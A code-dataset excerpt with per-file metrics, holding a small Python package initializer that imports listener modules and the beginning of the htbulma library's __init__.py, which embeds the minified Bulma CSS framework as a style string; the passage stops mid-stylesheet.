| 0.712644
| 0
| 0
| 0.411765
| 0
| 0
| 0.00363
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.117647
| false
| 0
| 0.058824
| 0
| 0.205882
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
2183456179085f89f3812890da91022fb21b253f
| 96
|
py
|
Python
|
trompet/listeners/__init__.py
|
aether-space/trompet
|
7c0b8576782a790ae6623ab4f930f43174e5559d
|
[
"BSD-3-Clause"
] | null | null | null |
trompet/listeners/__init__.py
|
aether-space/trompet
|
7c0b8576782a790ae6623ab4f930f43174e5559d
|
[
"BSD-3-Clause"
] | null | null | null |
trompet/listeners/__init__.py
|
aether-space/trompet
|
7c0b8576782a790ae6623ab4f930f43174e5559d
|
[
"BSD-3-Clause"
] | null | null | null |
from trompet.listeners._registry import registry
from trompet.listeners import webhook, xmlrpc
| 24
| 48
| 0.854167
| 12
| 96
| 6.75
| 0.583333
| 0.271605
| 0.493827
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104167
| 96
| 3
| 49
| 32
| 0.94186
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
21abc46cfc48ab56a01fbe79f51382971ccc30a8
| 196,818
|
py
|
Python
|
htbulma/__init__.py
|
manatlan/htbulma
|
d756a62ad9781bb6842d6bf49bdb065941dfb7d2
|
[
"MIT"
] | null | null | null |
htbulma/__init__.py
|
manatlan/htbulma
|
d756a62ad9781bb6842d6bf49bdb065941dfb7d2
|
[
"MIT"
] | null | null | null |
htbulma/__init__.py
|
manatlan/htbulma
|
d756a62ad9781bb6842d6bf49bdb065941dfb7d2
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# #############################################################################
# Copyright (C) 2022 manatlan manatlan[at]gmail(dot)com
#
# MIT licence
#
# https://github.com/manatlan/htbulma
# #############################################################################
from htag import Tag
__version__="0.5.0"
# css=Tag.H.link( _href="https://cdn.jsdelivr.net/npm/bulma@0.8.2/css/bulma.min.css",_rel="stylesheet")
css= Tag.H.style( r"""/*! bulma.io v0.8.2 | MIT License | github.com/jgthms/bulma */@-webkit-keyframes spinAround{from{transform:rotate(0)}to{transform:rotate(359deg)}}@keyframes spinAround{from{transform:rotate(0)}to{transform:rotate(359deg)}}.breadcrumb,.button,.delete,.file,.is-unselectable,.modal-close,.pagination-ellipsis,.pagination-link,.pagination-next,.pagination-previous,.tabs{-webkit-touch-callout:none;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.navbar-link:not(.is-arrowless)::after,.select:not(.is-multiple):not(.is-loading)::after{border:3px solid transparent;border-radius:2px;border-right:0;border-top:0;content:" ";display:block;height:.625em;margin-top:-.4375em;pointer-events:none;position:absolute;top:50%;transform:rotate(-45deg);transform-origin:center;width:.625em}.block:not(:last-child),.box:not(:last-child),.breadcrumb:not(:last-child),.content:not(:last-child),.highlight:not(:last-child),.level:not(:last-child),.list:not(:last-child),.message:not(:last-child),.notification:not(:last-child),.pagination:not(:last-child),.progress:not(:last-child),.subtitle:not(:last-child),.table-container:not(:last-child),.table:not(:last-child),.tabs:not(:last-child),.title:not(:last-child){margin-bottom:1.5rem}.delete,.modal-close{-moz-appearance:none;-webkit-appearance:none;background-color:rgba(10,10,10,.2);border:none;border-radius:290486px;cursor:pointer;pointer-events:auto;display:inline-block;flex-grow:0;flex-shrink:0;font-size:0;height:20px;max-height:20px;max-width:20px;min-height:20px;min-width:20px;outline:0;position:relative;vertical-align:top;width:20px}.delete::after,.delete::before,.modal-close::after,.modal-close::before{background-color:#fff;content:"";display:block;left:50%;position:absolute;top:50%;transform:translateX(-50%) translateY(-50%) rotate(45deg);transform-origin:center center}.delete::before,.modal-close::before{height:2px;width:50%}.delete::after,.modal-close::after{height:50%;width:2px}.delete:focus,.delete:hover,.modal-close:focus,.modal-close:hover{background-color:rgba(10,10,10,.3)}.delete:active,.modal-close:active{background-color:rgba(10,10,10,.4)}.is-small.delete,.is-small.modal-close{height:16px;max-height:16px;max-width:16px;min-height:16px;min-width:16px;width:16px}.is-medium.delete,.is-medium.modal-close{height:24px;max-height:24px;max-width:24px;min-height:24px;min-width:24px;width:24px}.is-large.delete,.is-large.modal-close{height:32px;max-height:32px;max-width:32px;min-height:32px;min-width:32px;width:32px}.button.is-loading::after,.control.is-loading::after,.loader,.select.is-loading::after{-webkit-animation:spinAround .5s infinite linear;animation:spinAround .5s infinite linear;border:2px solid #dbdbdb;border-radius:290486px;border-right-color:transparent;border-top-color:transparent;content:"";display:block;height:1em;position:relative;width:1em}.hero-video,.image.is-16by9 .has-ratio,.image.is-16by9 img,.image.is-1by1 .has-ratio,.image.is-1by1 img,.image.is-1by2 .has-ratio,.image.is-1by2 img,.image.is-1by3 .has-ratio,.image.is-1by3 img,.image.is-2by1 .has-ratio,.image.is-2by1 img,.image.is-2by3 .has-ratio,.image.is-2by3 img,.image.is-3by1 .has-ratio,.image.is-3by1 img,.image.is-3by2 .has-ratio,.image.is-3by2 img,.image.is-3by4 .has-ratio,.image.is-3by4 img,.image.is-3by5 .has-ratio,.image.is-3by5 img,.image.is-4by3 .has-ratio,.image.is-4by3 img,.image.is-4by5 .has-ratio,.image.is-4by5 img,.image.is-5by3 .has-ratio,.image.is-5by3 img,.image.is-5by4 .has-ratio,.image.is-5by4 img,.image.is-9by16 .has-ratio,.image.is-9by16 img,.image.is-square .has-ratio,.image.is-square img,.is-overlay,.modal,.modal-background{bottom:0;left:0;position:absolute;right:0;top:0}.button,.file-cta,.file-name,.input,.pagination-ellipsis,.pagination-link,.pagination-next,.pagination-previous,.select select,.textarea{-moz-appearance:none;-webkit-appearance:none;align-items:center;border:1px solid transparent;border-radius:4px;box-shadow:none;display:inline-flex;font-size:1rem;height:2.5em;justify-content:flex-start;line-height:1.5;padding-bottom:calc(.5em - 1px);padding-left:calc(.75em - 1px);padding-right:calc(.75em - 1px);padding-top:calc(.5em - 1px);position:relative;vertical-align:top}.button:active,.button:focus,.file-cta:active,.file-cta:focus,.file-name:active,.file-name:focus,.input:active,.input:focus,.is-active.button,.is-active.file-cta,.is-active.file-name,.is-active.input,.is-active.pagination-ellipsis,.is-active.pagination-link,.is-active.pagination-next,.is-active.pagination-previous,.is-active.textarea,.is-focused.button,.is-focused.file-cta,.is-focused.file-name,.is-focused.input,.is-focused.pagination-ellipsis,.is-focused.pagination-link,.is-focused.pagination-next,.is-focused.pagination-previous,.is-focused.textarea,.pagination-ellipsis:active,.pagination-ellipsis:focus,.pagination-link:active,.pagination-link:focus,.pagination-next:active,.pagination-next:focus,.pagination-previous:active,.pagination-previous:focus,.select select.is-active,.select select.is-focused,.select select:active,.select select:focus,.textarea:active,.textarea:focus{outline:0}.button[disabled],.file-cta[disabled],.file-name[disabled],.input[disabled],.pagination-ellipsis[disabled],.pagination-link[disabled],.pagination-next[disabled],.pagination-previous[disabled],.select fieldset[disabled] select,.select select[disabled],.textarea[disabled],fieldset[disabled] .button,fieldset[disabled] .file-cta,fieldset[disabled] .file-name,fieldset[disabled] .input,fieldset[disabled] .pagination-ellipsis,fieldset[disabled] .pagination-link,fieldset[disabled] .pagination-next,fieldset[disabled] .pagination-previous,fieldset[disabled] .select select,fieldset[disabled] .textarea{cursor:not-allowed}/*! minireset.css v0.0.6 | MIT License | github.com/jgthms/minireset.css */blockquote,body,dd,dl,dt,fieldset,figure,h1,h2,h3,h4,h5,h6,hr,html,iframe,legend,li,ol,p,pre,textarea,ul{margin:0;padding:0}h1,h2,h3,h4,h5,h6{font-size:100%;font-weight:400}ul{list-style:none}button,input,select,textarea{margin:0}html{box-sizing:border-box}*,::after,::before{box-sizing:inherit}img,video{height:auto;max-width:100%}iframe{border:0}table{border-collapse:collapse;border-spacing:0}td,th{padding:0}td:not([align]),th:not([align]){text-align:left}html{background-color:#fff;font-size:16px;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;min-width:300px;overflow-x:hidden;overflow-y:scroll;text-rendering:optimizeLegibility;-webkit-text-size-adjust:100%;-moz-text-size-adjust:100%;-ms-text-size-adjust:100%;text-size-adjust:100%}article,aside,figure,footer,header,hgroup,section{display:block}body,button,input,select,textarea{font-family:BlinkMacSystemFont,-apple-system,"Segoe UI",Roboto,Oxygen,Ubuntu,Cantarell,"Fira Sans","Droid Sans","Helvetica Neue",Helvetica,Arial,sans-serif}code,pre{-moz-osx-font-smoothing:auto;-webkit-font-smoothing:auto;font-family:monospace}body{color:#4a4a4a;font-size:1em;font-weight:400;line-height:1.5}a{color:#3273dc;cursor:pointer;text-decoration:none}a strong{color:currentColor}a:hover{color:#363636}code{background-color:#f5f5f5;color:#f14668;font-size:.875em;font-weight:400;padding:.25em .5em .25em}hr{background-color:#f5f5f5;border:none;display:block;height:2px;margin:1.5rem 0}img{height:auto;max-width:100%}input[type=checkbox],input[type=radio]{vertical-align:baseline}small{font-size:.875em}span{font-style:inherit;font-weight:inherit}strong{color:#363636;font-weight:700}fieldset{border:none}pre{-webkit-overflow-scrolling:touch;background-color:#f5f5f5;color:#4a4a4a;font-size:.875em;overflow-x:auto;padding:1.25rem 1.5rem;white-space:pre;word-wrap:normal}pre code{background-color:transparent;color:currentColor;font-size:1em;padding:0}table td,table th{vertical-align:top}table td:not([align]),table th:not([align]){text-align:left}table th{color:#363636}.is-clearfix::after{clear:both;content:" ";display:table}.is-pulled-left{float:left!important}.is-pulled-right{float:right!important}.is-clipped{overflow:hidden!important}.is-size-1{font-size:3rem!important}.is-size-2{font-size:2.5rem!important}.is-size-3{font-size:2rem!important}.is-size-4{font-size:1.5rem!important}.is-size-5{font-size:1.25rem!important}.is-size-6{font-size:1rem!important}.is-size-7{font-size:.75rem!important}@media screen and (max-width:768px){.is-size-1-mobile{font-size:3rem!important}.is-size-2-mobile{font-size:2.5rem!important}.is-size-3-mobile{font-size:2rem!important}.is-size-4-mobile{font-size:1.5rem!important}.is-size-5-mobile{font-size:1.25rem!important}.is-size-6-mobile{font-size:1rem!important}.is-size-7-mobile{font-size:.75rem!important}}@media screen and (min-width:769px),print{.is-size-1-tablet{font-size:3rem!important}.is-size-2-tablet{font-size:2.5rem!important}.is-size-3-tablet{font-size:2rem!important}.is-size-4-tablet{font-size:1.5rem!important}.is-size-5-tablet{font-size:1.25rem!important}.is-size-6-tablet{font-size:1rem!important}.is-size-7-tablet{font-size:.75rem!important}}@media screen and (max-width:1023px){.is-size-1-touch{font-size:3rem!important}.is-size-2-touch{font-size:2.5rem!important}.is-size-3-touch{font-size:2rem!important}.is-size-4-touch{font-size:1.5rem!important}.is-size-5-touch{font-size:1.25rem!important}.is-size-6-touch{font-size:1rem!important}.is-size-7-touch{font-size:.75rem!important}}@media screen and (min-width:1024px){.is-size-1-desktop{font-size:3rem!important}.is-size-2-desktop{font-size:2.5rem!important}.is-size-3-desktop{font-size:2rem!important}.is-size-4-desktop{font-size:1.5rem!important}.is-size-5-desktop{font-size:1.25rem!important}.is-size-6-desktop{font-size:1rem!important}.is-size-7-desktop{font-size:.75rem!important}}@media screen and (min-width:1216px){.is-size-1-widescreen{font-size:3rem!important}.is-size-2-widescreen{font-size:2.5rem!important}.is-size-3-widescreen{font-size:2rem!important}.is-size-4-widescreen{font-size:1.5rem!important}.is-size-5-widescreen{font-size:1.25rem!important}.is-size-6-widescreen{font-size:1rem!important}.is-size-7-widescreen{font-size:.75rem!important}}@media screen and (min-width:1408px){.is-size-1-fullhd{font-size:3rem!important}.is-size-2-fullhd{font-size:2.5rem!important}.is-size-3-fullhd{font-size:2rem!important}.is-size-4-fullhd{font-size:1.5rem!important}.is-size-5-fullhd{font-size:1.25rem!important}.is-size-6-fullhd{font-size:1rem!important}.is-size-7-fullhd{font-size:.75rem!important}}.has-text-centered{text-align:center!important}.has-text-justified{text-align:justify!important}.has-text-left{text-align:left!important}.has-text-right{text-align:right!important}@media screen and (max-width:768px){.has-text-centered-mobile{text-align:center!important}}@media screen and (min-width:769px),print{.has-text-centered-tablet{text-align:center!important}}@media screen and (min-width:769px) and (max-width:1023px){.has-text-centered-tablet-only{text-align:center!important}}@media screen and (max-width:1023px){.has-text-centered-touch{text-align:center!important}}@media screen and (min-width:1024px){.has-text-centered-desktop{text-align:center!important}}@media screen and (min-width:1024px) and (max-width:1215px){.has-text-centered-desktop-only{text-align:center!important}}@media screen and (min-width:1216px){.has-text-centered-widescreen{text-align:center!important}}@media screen and (min-width:1216px) and (max-width:1407px){.has-text-centered-widescreen-only{text-align:center!important}}@media screen and (min-width:1408px){.has-text-centered-fullhd{text-align:center!important}}@media screen and (max-width:768px){.has-text-justified-mobile{text-align:justify!important}}@media screen and (min-width:769px),print{.has-text-justified-tablet{text-align:justify!important}}@media screen and (min-width:769px) and (max-width:1023px){.has-text-justified-tablet-only{text-align:justify!important}}@media screen and (max-width:1023px){.has-text-justified-touch{text-align:justify!important}}@media screen and (min-width:1024px){.has-text-justified-desktop{text-align:justify!important}}@media screen and (min-width:1024px) and (max-width:1215px){.has-text-justified-desktop-only{text-align:justify!important}}@media screen and (min-width:1216px){.has-text-justified-widescreen{text-align:justify!important}}@media screen and (min-width:1216px) and (max-width:1407px){.has-text-justified-widescreen-only{text-align:justify!important}}@media screen and (min-width:1408px){.has-text-justified-fullhd{text-align:justify!important}}@media screen and (max-width:768px){.has-text-left-mobile{text-align:left!important}}@media screen and (min-width:769px),print{.has-text-left-tablet{text-align:left!important}}@media screen and (min-width:769px) and (max-width:1023px){.has-text-left-tablet-only{text-align:left!important}}@media screen and (max-width:1023px){.has-text-left-touch{text-align:left!important}}@media screen and (min-width:1024px){.has-text-left-desktop{text-align:left!important}}@media screen and (min-width:1024px) and (max-width:1215px){.has-text-left-desktop-only{text-align:left!important}}@media screen and (min-width:1216px){.has-text-left-widescreen{text-align:left!important}}@media screen and (min-width:1216px) and (max-width:1407px){.has-text-left-widescreen-only{text-align:left!important}}@media screen and (min-width:1408px){.has-text-left-fullhd{text-align:left!important}}@media screen and (max-width:768px){.has-text-right-mobile{text-align:right!important}}@media screen and (min-width:769px),print{.has-text-right-tablet{text-align:right!important}}@media screen and (min-width:769px) and (max-width:1023px){.has-text-right-tablet-only{text-align:right!important}}@media screen and (max-width:1023px){.has-text-right-touch{text-align:right!important}}@media screen and (min-width:1024px){.has-text-right-desktop{text-align:right!important}}@media screen and (min-width:1024px) and (max-width:1215px){.has-text-right-desktop-only{text-align:right!important}}@media screen and (min-width:1216px){.has-text-right-widescreen{text-align:right!important}}@media screen and (min-width:1216px) and (max-width:1407px){.has-text-right-widescreen-only{text-align:right!important}}@media screen and (min-width:1408px){.has-text-right-fullhd{text-align:right!important}}.is-capitalized{text-transform:capitalize!important}.is-lowercase{text-transform:lowercase!important}.is-uppercase{text-transform:uppercase!important}.is-italic{font-style:italic!important}.has-text-white{color:#fff!important}a.has-text-white:focus,a.has-text-white:hover{color:#e6e6e6!important}.has-background-white{background-color:#fff!important}.has-text-black{color:#0a0a0a!important}a.has-text-black:focus,a.has-text-black:hover{color:#000!important}.has-background-black{background-color:#0a0a0a!important}.has-text-light{color:#f5f5f5!important}a.has-text-light:focus,a.has-text-light:hover{color:#dbdbdb!important}.has-background-light{background-color:#f5f5f5!important}.has-text-dark{color:#363636!important}a.has-text-dark:focus,a.has-text-dark:hover{color:#1c1c1c!important}.has-background-dark{background-color:#363636!important}.has-text-primary{color:#00d1b2!important}a.has-text-primary:focus,a.has-text-primary:hover{color:#009e86!important}.has-background-primary{background-color:#00d1b2!important}.has-text-link{color:#3273dc!important}a.has-text-link:focus,a.has-text-link:hover{color:#205bbc!important}.has-background-link{background-color:#3273dc!important}.has-text-info{color:#3298dc!important}a.has-text-info:focus,a.has-text-info:hover{color:#207dbc!important}.has-background-info{background-color:#3298dc!important}.has-text-success{color:#48c774!important}a.has-text-success:focus,a.has-text-success:hover{color:#34a85c!important}.has-background-success{background-color:#48c774!important}.has-text-warning{color:#ffdd57!important}a.has-text-warning:focus,a.has-text-warning:hover{color:#ffd324!important}.has-background-warning{background-color:#ffdd57!important}.has-text-danger{color:#f14668!important}a.has-text-danger:focus,a.has-text-danger:hover{color:#ee1742!important}.has-background-danger{background-color:#f14668!important}.has-text-black-bis{color:#121212!important}.has-background-black-bis{background-color:#121212!important}.has-text-black-ter{color:#242424!important}.has-background-black-ter{background-color:#242424!important}.has-text-grey-darker{color:#363636!important}.has-background-grey-darker{background-color:#363636!important}.has-text-grey-dark{color:#4a4a4a!important}.has-background-grey-dark{background-color:#4a4a4a!important}.has-text-grey{color:#7a7a7a!important}.has-background-grey{background-color:#7a7a7a!important}.has-text-grey-light{color:#b5b5b5!important}.has-background-grey-light{background-color:#b5b5b5!important}.has-text-grey-lighter{color:#dbdbdb!important}.has-background-grey-lighter{background-color:#dbdbdb!important}.has-text-white-ter{color:#f5f5f5!important}.has-background-white-ter{background-color:#f5f5f5!important}.has-text-white-bis{color:#fafafa!important}.has-background-white-bis{background-color:#fafafa!important}.has-text-weight-light{font-weight:300!important}.has-text-weight-normal{font-weight:400!important}.has-text-weight-medium{font-weight:500!important}.has-text-weight-semibold{font-weight:600!important}.has-text-weight-bold{font-weight:700!important}.is-family-primary{font-family:BlinkMacSystemFont,-apple-system,"Segoe UI",Roboto,Oxygen,Ubuntu,Cantarell,"Fira Sans","Droid Sans","Helvetica Neue",Helvetica,Arial,sans-serif!important}.is-family-secondary{font-family:BlinkMacSystemFont,-apple-system,"Segoe UI",Roboto,Oxygen,Ubuntu,Cantarell,"Fira Sans","Droid Sans","Helvetica Neue",Helvetica,Arial,sans-serif!important}.is-family-sans-serif{font-family:BlinkMacSystemFont,-apple-system,"Segoe UI",Roboto,Oxygen,Ubuntu,Cantarell,"Fira Sans","Droid Sans","Helvetica Neue",Helvetica,Arial,sans-serif!important}.is-family-monospace{font-family:monospace!important}.is-family-code{font-family:monospace!important}.is-block{display:block!important}@media screen and (max-width:768px){.is-block-mobile{display:block!important}}@media screen and (min-width:769px),print{.is-block-tablet{display:block!important}}@media screen and (min-width:769px) and (max-width:1023px){.is-block-tablet-only{display:block!important}}@media screen and (max-width:1023px){.is-block-touch{display:block!important}}@media screen and (min-width:1024px){.is-block-desktop{display:block!important}}@media screen and (min-width:1024px) and (max-width:1215px){.is-block-desktop-only{display:block!important}}@media screen and (min-width:1216px){.is-block-widescreen{display:block!important}}@media screen and (min-width:1216px) and (max-width:1407px){.is-block-widescreen-only{display:block!important}}@media screen and (min-width:1408px){.is-block-fullhd{display:block!important}}.is-flex{display:flex!important}@media screen and (max-width:768px){.is-flex-mobile{display:flex!important}}@media screen and (min-width:769px),print{.is-flex-tablet{display:flex!important}}@media screen and (min-width:769px) and (max-width:1023px){.is-flex-tablet-only{display:flex!important}}@media screen and (max-width:1023px){.is-flex-touch{display:flex!important}}@media screen and (min-width:1024px){.is-flex-desktop{display:flex!important}}@media screen and (min-width:1024px) and (max-width:1215px){.is-flex-desktop-only{display:flex!important}}@media screen and (min-width:1216px){.is-flex-widescreen{display:flex!important}}@media screen and (min-width:1216px) and (max-width:1407px){.is-flex-widescreen-only{display:flex!important}}@media screen and (min-width:1408px){.is-flex-fullhd{display:flex!important}}.is-inline{display:inline!important}@media screen and (max-width:768px){.is-inline-mobile{display:inline!important}}@media screen and (min-width:769px),print{.is-inline-tablet{display:inline!important}}@media screen and (min-width:769px) and (max-width:1023px){.is-inline-tablet-only{display:inline!important}}@media screen and (max-width:1023px){.is-inline-touch{display:inline!important}}@media screen and (min-width:1024px){.is-inline-desktop{display:inline!important}}@media screen and (min-width:1024px) and (max-width:1215px){.is-inline-desktop-only{display:inline!important}}@media screen and (min-width:1216px){.is-inline-widescreen{display:inline!important}}@media screen and (min-width:1216px) and (max-width:1407px){.is-inline-widescreen-only{display:inline!important}}@media screen and (min-width:1408px){.is-inline-fullhd{display:inline!important}}.is-inline-block{display:inline-block!important}@media screen and (max-width:768px){.is-inline-block-mobile{display:inline-block!important}}@media screen and (min-width:769px),print{.is-inline-block-tablet{display:inline-block!important}}@media screen and (min-width:769px) and (max-width:1023px){.is-inline-block-tablet-only{display:inline-block!important}}@media screen and (max-width:1023px){.is-inline-block-touch{display:inline-block!important}}@media screen and (min-width:1024px){.is-inline-block-desktop{display:inline-block!important}}@media screen and (min-width:1024px) and (max-width:1215px){.is-inline-block-desktop-only{display:inline-block!important}}@media screen and (min-width:1216px){.is-inline-block-widescreen{display:inline-block!important}}@media screen and (min-width:1216px) and (max-width:1407px){.is-inline-block-widescreen-only{display:inline-block!important}}@media screen and (min-width:1408px){.is-inline-block-fullhd{display:inline-block!important}}.is-inline-flex{display:inline-flex!important}@media screen and (max-width:768px){.is-inline-flex-mobile{display:inline-flex!important}}@media screen and (min-width:769px),print{.is-inline-flex-tablet{display:inline-flex!important}}@media screen and (min-width:769px) and (max-width:1023px){.is-inline-flex-tablet-only{display:inline-flex!important}}@media screen and (max-width:1023px){.is-inline-flex-touch{display:inline-flex!important}}@media screen and (min-width:1024px){.is-inline-flex-desktop{display:inline-flex!important}}@media screen and (min-width:1024px) and (max-width:1215px){.is-inline-flex-desktop-only{display:inline-flex!important}}@media screen and (min-width:1216px){.is-inline-flex-widescreen{display:inline-flex!important}}@media screen and (min-width:1216px) and (max-width:1407px){.is-inline-flex-widescreen-only{display:inline-flex!important}}@media screen and (min-width:1408px){.is-inline-flex-fullhd{display:inline-flex!important}}.is-hidden{display:none!important}.is-sr-only{border:none!important;clip:rect(0,0,0,0)!important;height:.01em!important;overflow:hidden!important;padding:0!important;position:absolute!important;white-space:nowrap!important;width:.01em!important}@media screen and (max-width:768px){.is-hidden-mobile{display:none!important}}@media screen and (min-width:769px),print{.is-hidden-tablet{display:none!important}}@media screen and (min-width:769px) and (max-width:1023px){.is-hidden-tablet-only{display:none!important}}@media screen and (max-width:1023px){.is-hidden-touch{display:none!important}}@media screen and (min-width:1024px){.is-hidden-desktop{display:none!important}}@media screen and (min-width:1024px) and (max-width:1215px){.is-hidden-desktop-only{display:none!important}}@media screen and (min-width:1216px){.is-hidden-widescreen{display:none!important}}@media screen and (min-width:1216px) and (max-width:1407px){.is-hidden-widescreen-only{display:none!important}}@media screen and (min-width:1408px){.is-hidden-fullhd{display:none!important}}.is-invisible{visibility:hidden!important}@media screen and (max-width:768px){.is-invisible-mobile{visibility:hidden!important}}@media screen and (min-width:769px),print{.is-invisible-tablet{visibility:hidden!important}}@media screen and (min-width:769px) and (max-width:1023px){.is-invisible-tablet-only{visibility:hidden!important}}@media screen and (max-width:1023px){.is-invisible-touch{visibility:hidden!important}}@media screen and (min-width:1024px){.is-invisible-desktop{visibility:hidden!important}}@media screen and (min-width:1024px) and (max-width:1215px){.is-invisible-desktop-only{visibility:hidden!important}}@media screen and (min-width:1216px){.is-invisible-widescreen{visibility:hidden!important}}@media screen and (min-width:1216px) and (max-width:1407px){.is-invisible-widescreen-only{visibility:hidden!important}}@media screen and (min-width:1408px){.is-invisible-fullhd{visibility:hidden!important}}.is-marginless{margin:0!important}.is-paddingless{padding:0!important}.is-radiusless{border-radius:0!important}.is-shadowless{box-shadow:none!important}.is-relative{position:relative!important}.box{background-color:#fff;border-radius:6px;box-shadow:0 .5em 1em -.125em rgba(10,10,10,.1),0 0 0 1px rgba(10,10,10,.02);color:#4a4a4a;display:block;padding:1.25rem}a.box:focus,a.box:hover{box-shadow:0 .5em 1em -.125em rgba(10,10,10,.1),0 0 0 1px #3273dc}a.box:active{box-shadow:inset 0 1px 2px rgba(10,10,10,.2),0 0 0 1px #3273dc}.button{background-color:#fff;border-color:#dbdbdb;border-width:1px;color:#363636;cursor:pointer;justify-content:center;padding-bottom:calc(.5em - 1px);padding-left:1em;padding-right:1em;padding-top:calc(.5em - 1px);text-align:center;white-space:nowrap}.button strong{color:inherit}.button .icon,.button .icon.is-large,.button .icon.is-medium,.button .icon.is-small{height:1.5em;width:1.5em}.button .icon:first-child:not(:last-child){margin-left:calc(-.5em - 1px);margin-right:.25em}.button .icon:last-child:not(:first-child){margin-left:.25em;margin-right:calc(-.5em - 1px)}.button .icon:first-child:last-child{margin-left:calc(-.5em - 1px);margin-right:calc(-.5em - 1px)}.button.is-hovered,.button:hover{border-color:#b5b5b5;color:#363636}.button.is-focused,.button:focus{border-color:#3273dc;color:#363636}.button.is-focused:not(:active),.button:focus:not(:active){box-shadow:0 0 0 .125em rgba(50,115,220,.25)}.button.is-active,.button:active{border-color:#4a4a4a;color:#363636}.button.is-text{background-color:transparent;border-color:transparent;color:#4a4a4a;text-decoration:underline}.button.is-text.is-focused,.button.is-text.is-hovered,.button.is-text:focus,.button.is-text:hover{background-color:#f5f5f5;color:#363636}.button.is-text.is-active,.button.is-text:active{background-color:#e8e8e8;color:#363636}.button.is-text[disabled],fieldset[disabled] .button.is-text{background-color:transparent;border-color:transparent;box-shadow:none}.button.is-white{background-color:#fff;border-color:transparent;color:#0a0a0a}.button.is-white.is-hovered,.button.is-white:hover{background-color:#f9f9f9;border-color:transparent;color:#0a0a0a}.button.is-white.is-focused,.button.is-white:focus{border-color:transparent;color:#0a0a0a}.button.is-white.is-focused:not(:active),.button.is-white:focus:not(:active){box-shadow:0 0 0 .125em rgba(255,255,255,.25)}.button.is-white.is-active,.button.is-white:active{background-color:#f2f2f2;border-color:transparent;color:#0a0a0a}.button.is-white[disabled],fieldset[disabled] .button.is-white{background-color:#fff;border-color:transparent;box-shadow:none}.button.is-white.is-inverted{background-color:#0a0a0a;color:#fff}.button.is-white.is-inverted.is-hovered,.button.is-white.is-inverted:hover{background-color:#000}.button.is-white.is-inverted[disabled],fieldset[disabled] .button.is-white.is-inverted{background-color:#0a0a0a;border-color:transparent;box-shadow:none;color:#fff}.button.is-white.is-loading::after{border-color:transparent transparent #0a0a0a #0a0a0a!important}.button.is-white.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-white.is-outlined.is-focused,.button.is-white.is-outlined.is-hovered,.button.is-white.is-outlined:focus,.button.is-white.is-outlined:hover{background-color:#fff;border-color:#fff;color:#0a0a0a}.button.is-white.is-outlined.is-loading::after{border-color:transparent transparent #fff #fff!important}.button.is-white.is-outlined.is-loading.is-focused::after,.button.is-white.is-outlined.is-loading.is-hovered::after,.button.is-white.is-outlined.is-loading:focus::after,.button.is-white.is-outlined.is-loading:hover::after{border-color:transparent transparent #0a0a0a #0a0a0a!important}.button.is-white.is-outlined[disabled],fieldset[disabled] .button.is-white.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-white.is-inverted.is-outlined{background-color:transparent;border-color:#0a0a0a;color:#0a0a0a}.button.is-white.is-inverted.is-outlined.is-focused,.button.is-white.is-inverted.is-outlined.is-hovered,.button.is-white.is-inverted.is-outlined:focus,.button.is-white.is-inverted.is-outlined:hover{background-color:#0a0a0a;color:#fff}.button.is-white.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-white.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-white.is-inverted.is-outlined.is-loading:focus::after,.button.is-white.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #fff #fff!important}.button.is-white.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-white.is-inverted.is-outlined{background-color:transparent;border-color:#0a0a0a;box-shadow:none;color:#0a0a0a}.button.is-black{background-color:#0a0a0a;border-color:transparent;color:#fff}.button.is-black.is-hovered,.button.is-black:hover{background-color:#040404;border-color:transparent;color:#fff}.button.is-black.is-focused,.button.is-black:focus{border-color:transparent;color:#fff}.button.is-black.is-focused:not(:active),.button.is-black:focus:not(:active){box-shadow:0 0 0 .125em rgba(10,10,10,.25)}.button.is-black.is-active,.button.is-black:active{background-color:#000;border-color:transparent;color:#fff}.button.is-black[disabled],fieldset[disabled] .button.is-black{background-color:#0a0a0a;border-color:transparent;box-shadow:none}.button.is-black.is-inverted{background-color:#fff;color:#0a0a0a}.button.is-black.is-inverted.is-hovered,.button.is-black.is-inverted:hover{background-color:#f2f2f2}.button.is-black.is-inverted[disabled],fieldset[disabled] .button.is-black.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#0a0a0a}.button.is-black.is-loading::after{border-color:transparent transparent #fff #fff!important}.button.is-black.is-outlined{background-color:transparent;border-color:#0a0a0a;color:#0a0a0a}.button.is-black.is-outlined.is-focused,.button.is-black.is-outlined.is-hovered,.button.is-black.is-outlined:focus,.button.is-black.is-outlined:hover{background-color:#0a0a0a;border-color:#0a0a0a;color:#fff}.button.is-black.is-outlined.is-loading::after{border-color:transparent transparent #0a0a0a #0a0a0a!important}.button.is-black.is-outlined.is-loading.is-focused::after,.button.is-black.is-outlined.is-loading.is-hovered::after,.button.is-black.is-outlined.is-loading:focus::after,.button.is-black.is-outlined.is-loading:hover::after{border-color:transparent transparent #fff #fff!important}.button.is-black.is-outlined[disabled],fieldset[disabled] 